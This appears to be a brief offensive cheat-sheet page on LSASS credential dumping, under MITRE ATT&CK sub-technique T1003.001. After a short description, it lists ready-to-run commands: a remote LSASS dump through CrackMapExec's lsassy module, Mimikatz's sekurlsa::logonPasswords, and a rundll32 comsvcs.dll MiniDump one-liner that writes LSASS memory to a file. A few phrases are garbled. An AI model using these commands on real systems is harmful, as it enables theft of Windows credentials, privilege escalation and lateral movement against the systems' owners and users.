MITRE ATT&CK, Credential Access, Sub-technique T1003.001
Last updated 2 years ago
Adversaries commonly abuse the (LSASS) to dump credentials for privilege escalation, data theft, and lateral movement. The process is a fruitful target for adversaries because of the sheer amount of sensitive information it stores in memory.
# Dumping LSASS remotely with CrackMapExec crackmapexec smb $ip -u $username -p $password -M lsassy # Dumping LSASS with Mimikatz sekurlsa::logonPasswords
## https://twitter.com/inversecos/status/1450331995112804358?s=20&t=rMzsQI6ENH2SYVVaTYTqAA rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id Temp\output.dmp full;Wait-Process -Id (Get-Process rundll32).id
